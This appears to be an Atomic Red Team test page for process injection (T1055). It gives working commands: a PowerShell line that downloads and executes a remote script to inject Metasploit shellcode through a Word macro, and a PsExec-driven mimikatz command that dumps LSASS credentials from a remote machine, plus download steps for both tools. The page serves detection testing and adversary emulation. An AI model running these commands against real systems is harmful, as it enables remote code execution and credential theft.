Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines.
Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required.
Supported Platforms: Windows
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 } Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
It must be executed in the context of a user who is privileged on remote machine.
The effect of /inject is explained in https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| machine | machine to target (via psexec) | string | DC1 |
| mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe |
| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe |
#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1} $mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -ForceDescription: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force